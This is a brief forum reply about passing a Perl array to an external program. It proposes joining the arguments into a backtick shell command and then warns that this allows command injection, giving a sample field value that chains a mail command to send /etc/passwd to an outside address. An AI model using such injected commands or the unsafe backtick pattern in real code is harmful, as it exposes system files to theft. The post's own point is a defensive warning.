in reply to sending arguements to external program

Hi there,
1: your external program probably runs now like >program @array (Litterally)
2: you could try : my $CommandLine=join " ",@array; @output=`program $CommandLine`;
3: If you did that, and I could touch the program, and would have anything to say about
ANY field in @array, my field would say ";mail choas@dds.nl < /etc/passwd" So you might
wanna check for that

GrtZ!